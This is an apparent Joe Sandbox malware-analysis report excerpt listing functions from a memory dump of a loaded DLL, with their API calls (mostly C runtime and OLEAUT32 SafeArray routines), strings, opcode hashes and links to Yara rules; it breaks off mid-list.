Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 20873e60305b8f16dec0439fc49dd3db2040517128ab97a0cfcaac65da929489
Instruction ID: da4ae51dbb19b93706d94a1fd7523b865de6ef041a95165c7635d6c9dfa469fd
Opcode Fuzzy Hash: 20873e60305b8f16dec0439fc49dd3db2040517128ab97a0cfcaac65da929489
Instruction Fuzzy Hash: D741D972A042045BD708CE2CDC9166BB7E6EFD4214F098A6DF849DB749FA34ED05C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F874D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F874DA9

Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D913A
Part of subcall function 6F8D9125: __CxxThrowException@8.LIBCMT ref: 6F8D914F
Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D9160

std::_Xinvalid_argument.LIBCPMT ref: 6F874DCA
std::_Xinvalid_argument.LIBCPMT ref: 6F874DE5
_memmove.LIBCMT ref: 6F874E4D

Strings

string too long, xrefs: 6F874DC5, 6F874DE0
invalid string position, xrefs: 6F874DA4

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 0ca9dba0cab42925a38d81f8f9dbca3a3e34fb291537fc2e8415759fc00c1bd9
Instruction ID: c60aa5a2f92dd9a92d2f5c4b686241a621007437aab4efd2c010ae787f21d24e
Opcode Fuzzy Hash: 0ca9dba0cab42925a38d81f8f9dbca3a3e34fb291537fc2e8415759fc00c1bd9
Instruction Fuzzy Hash: C3316F32304214DFD7358E6CE890B6EB7A5BFD1674B200EAEE5558F681DB71E840C791

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E44E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6F8E4532
DName::operator+.LIBCMT ref: 6F8E4539
DName::DName.LIBCMT ref: 6F8E455B
DName::operator+.LIBCMT ref: 6F8E4562
DName::operator+.LIBCMT ref: 6F8E4569

Strings

throw(, xrefs: 6F8E452A, 6F8E4553

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: edc2075ed7f30ccc55a4d462f7d545639136bfd51dfb497431ab6bbc491eae01
Instruction ID: bdc0c90ae797e85a7b9bdb53666fa7f67f1a038870d81dac644c15791eabbb3f
Opcode Fuzzy Hash: edc2075ed7f30ccc55a4d462f7d545639136bfd51dfb497431ab6bbc491eae01
Instruction Fuzzy Hash: 51014074A00209BFCF05DBA8C856DED7BB9AB86348F0049A5E5069F2D4DB70AD468790

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DE9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6F909880,00000008,6F8DEAC1,00000000,00000000,?,?,6F8DD7DD,6F8D9DEF,00000000,?,6F8D9BD4,6F871290,8E16AAE4), ref: 6F8DE9CA
__lock.LIBCMT ref: 6F8DE9FE

Part of subcall function 6F8E2438: __mtinitlocknum.LIBCMT ref: 6F8E244E
Part of subcall function 6F8E2438: __amsg_exit.LIBCMT ref: 6F8E245A
Part of subcall function 6F8E2438: EnterCriticalSection.KERNEL32(6F8D9BD4,6F8D9BD4,?,6F8DEA03,0000000D), ref: 6F8E2462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6F8DEA0B
__lock.LIBCMT ref: 6F8DEA1F
___addlocaleref.LIBCMT ref: 6F8DEA3D

Strings

KERNEL32.DLL, xrefs: 6F8DE9C5

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 7e9d8bc55f6aa8719027679ca1c4200a393f24f5fbb3746d16c66f1a347777bb
Instruction ID: 436bac61c1c0b4bab900f526ce158399ce09c8a624b34110dc4797a2a3478a25
Opcode Fuzzy Hash: 7e9d8bc55f6aa8719027679ca1c4200a393f24f5fbb3746d16c66f1a347777bb
Instruction Fuzzy Hash: 9901AD71845B05EFD724DF69C905709FBE0BF91328F108D8EE4969A3E0CB74A644CB11

Uniqueness

Uniqueness Score: -1.00%

Function 6F88E120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F88E29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F88E2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F88E2D7

Part of subcall function 6F895760: std::tr1::_Xweak.LIBCPMT ref: 6F895769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F88E309

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6F88E523
InterlockedCompareExchange.KERNEL32(6F91C6A4,45524548,4B4F4F4C), ref: 6F88E544

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: 509d8137f9ab5436b69bab00d962db8b86d9e93b7001bb1b471272dc50ff8362
Instruction ID: 149cb0dfa4aa2674948c66129bdfa9a8aeeedf0332a531ca62336de3d7945409
Opcode Fuzzy Hash: 509d8137f9ab5436b69bab00d962db8b86d9e93b7001bb1b471272dc50ff8362
Instruction Fuzzy Hash: 17D1B271A00309AFDB10CFE8CC90B9E77B8AF45314F1449AAE925AF290D774ED40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F898A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 22b4cb34f8c53e084b2b246e56af3280aaa4867a9f91e7a6e677630c36de2c3e
Instruction ID: ef042f920b74eeba77553f3e03a84a71daec2fc7595e5ace5c690de999bde715
Opcode Fuzzy Hash: 22b4cb34f8c53e084b2b246e56af3280aaa4867a9f91e7a6e677630c36de2c3e
Instruction Fuzzy Hash: 0E411974E016199FCB04DFADC980A9EB7FAAF89200F6089CAE519DB355DB35E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: c68217ba93cfdf0731bf61cd773085775738decd2a99307ac16ee8b87569fd1f
Instruction ID: 981ea08be95c63bcaee982279958e9db3079baf9df56036d5230c388741ea25c
Opcode Fuzzy Hash: c68217ba93cfdf0731bf61cd773085775738decd2a99307ac16ee8b87569fd1f
Instruction Fuzzy Hash: C5412A71E006189FDB04DF6CCD80B9EB7B9AF89200F608ADAE519EB255DB35E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: c68217ba93cfdf0731bf61cd773085775738decd2a99307ac16ee8b87569fd1f
Instruction ID: 183abb59f0caf5b9247a61f336bc15a097b435356aa627731edf39364cb71b25
Opcode Fuzzy Hash: c68217ba93cfdf0731bf61cd773085775738decd2a99307ac16ee8b87569fd1f
Instruction Fuzzy Hash: 3F414D70A006189FDB04DF6CCD80B9DB7B9AF89300F208ADAE519EB251CB35E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5ddc7da5705b2a1f4bbb39e69e7cdae860511e705e7694936be93833d8f68d01
Instruction ID: 39c6b841e07735a0600b2b01e8a058df572af4451bf677d2ec10e1427f8d6ea0
Opcode Fuzzy Hash: 5ddc7da5705b2a1f4bbb39e69e7cdae860511e705e7694936be93833d8f68d01
Instruction Fuzzy Hash: F1311970E016089FCB14DF6DCD80B9EB7BAAF89200F6089C6E519EB255DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1a888945c546c34c40be0d5ceb7621bf813493bafd724bb855592ee29c581a3e
Instruction ID: 401b25d3c2342cc540d0ddd3150f40c4780b3f1178690d72df5748c15340939f
Opcode Fuzzy Hash: 1a888945c546c34c40be0d5ceb7621bf813493bafd724bb855592ee29c581a3e
Instruction Fuzzy Hash: C5311A70E006189FCB04DF6CCD80B9EB7B9AF89200F608AD6E419EB295DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 07ac03f6f655bbefab296aebad7d98372237f5c1dd76e4e57522280bd4a5b916
Instruction ID: 362c732ab697908ce3d21c2fa9bf099d71b25563a43476e5df87cc5519114def
Opcode Fuzzy Hash: 07ac03f6f655bbefab296aebad7d98372237f5c1dd76e4e57522280bd4a5b916
Instruction Fuzzy Hash: 18313970E016089FDB14DF6CCC80B9EB7B9AF89200F6089C6E419EB255CB75E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F890668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: fb031f880160e3531bc069d4daf882517da6467d662d3167d91d1e3ce5e18824
Instruction ID: 3d436b2c9efc1f64f2a38cd474f8cd44db70238dad5be1360fbd7e5329a1cf37
Opcode Fuzzy Hash: fb031f880160e3531bc069d4daf882517da6467d662d3167d91d1e3ce5e18824
Instruction Fuzzy Hash: 96311B70A006189FDB04DF6DCD80B9EB7B9AF89300F2089DAE519EB251DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8905DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 523acd4c12f6fc667fc1e53762c243b23be0d8855c1e7cc2c562572b0fab61e4
Instruction ID: 4c8236d7e23de8d2e3f729324311946fc77fa5376640b36effc4518a8f665a31
Opcode Fuzzy Hash: 523acd4c12f6fc667fc1e53762c243b23be0d8855c1e7cc2c562572b0fab61e4
Instruction Fuzzy Hash: 5C311B70A006189FDB04DF6DCD80B9DB7B9AF89310F208ADAE519EB251DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8904D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
